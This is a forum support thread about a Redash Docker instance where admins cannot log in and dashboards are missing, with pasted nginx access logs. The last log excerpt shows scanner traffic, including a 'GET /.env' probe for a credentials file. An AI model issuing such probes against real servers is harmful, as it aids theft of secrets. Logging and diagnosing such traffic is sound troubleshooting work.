We couldn’t login using some of user’s credential.
And when logged in using one user’s credential there is no any dashboard, queries and some added user’s data.

  • Redash Version: * Version: 8.0.0+b32245 (a16f551e)
  • Browser/OS:
  • How did you install Redash:Using docker

So is there any way to restore a stable auto backup?

You haven’t provided enough information for us to help you.

How long ago did you set up this Redash instance? Are things normal for any users? What happens if you log-in as an administrator? Do you see the missing dashboards? What is the status of these users who can’t log-in?

We setup the environment around March of 2021 (around 8 months)

I couldn’t login as adminstrator. Since I’m on of admin.
Other admin users also couldn’t login.

But on of non admin user can login. But there is a error page for dashboard and query saying that conduct administrator.

And he can see only the non admin user list under user section.

Thanks

Thank you. Sounds like something’s wrong on the server. What do you see when you check Redash’s logs?

docker-compose logs -f --tail 100

A long logs for the services

nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"

So is only the nginx container running? You ought to see many log messages at least from nginx and server.

There are lot of logs for nginx, schedular, postgre and etc…
I just add initial output since this text box not allow to add all logs.

The maximum size is 32000 characters, which should be plenty of space to post recent logs. Just wrap them in triple backticks ```.

Example where I duplicated your logs many times:

nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:16:27 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:08:20:44 +0000] "GET /static/images/favicon-32x32.png HTTP/1.1" 200 1603 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "POST /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 862 "http:///login?next=http%3A%2F%2F%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 212.104.236.183 - - [14/Dec/2021:08:31:51 +0000] "GET /static/server.5cdfe7b4f652b665b03f.css.map HTTP/1.1" 200 50380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /logout HTTP/1.1" 302 219 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:36:09 +0000] "GET /login HTTP/1.1" 200 799 "http:///" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 112.134.169.254 - - [14/Dec/2021:08:42:18 +0000] "GET /login?next=http%3A%2F%2F%2F HTTP/1.1" 200 799 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"

The most important services we care about here are the server and any worker processes.

1 Like
nginx_1             | 200.53.18.143 - - [14/Dec/2021:13:35:06 +0000] "GET / HTTP/1.1" 302 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:13:55:51 +0000] "POST /login?next=http%3A%2F%2FHOST_IP%2Fqueries HTTP/1.1" 200 866 "http://HOST_IP/login?next=http%3A%2F%2FHOST_IP%2Fqueries" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 103.6.151.241 - - [14/Dec/2021:13:55:52 +0000] "POST /login?next=http%3A%2F%2FHOST_IP%2Fqueries HTTP/1.1" 200 866 "http://HOST_IP/login?next=http%3A%2F%2FHOST_IP%2Fqueries" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-"
nginx_1             | 43.131.22.185 - - [14/Dec/2021:14:41:48 +0000] "GET / HTTP/1.1" 302 289 "-" "-" "-"
nginx_1             | 45.137.23.232 - - [14/Dec/2021:14:42:03 +0000] "GET / HTTP/1.1" 302 289 "-" "Mozilla/5.0 zgrab/0.x" "-"
nginx_1             | 172.18.0.1 - - [14/Dec/2021:15:39:39 +0000] "\xFF\xF4\xFF\xFD\x06" 400 173 "-" "-" "-"
nginx_1             | 85.202.169.115 - - [14/Dec/2021:15:46:40 +0000] "GET / HTTP/1.1" 302 299 "-" "Linux Gnu (cow)" "-"
nginx_1             | 70.37.106.128 - - [14/Dec/2021:16:41:43 +0000] "GET /.env HTTP/1.1" 302 297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
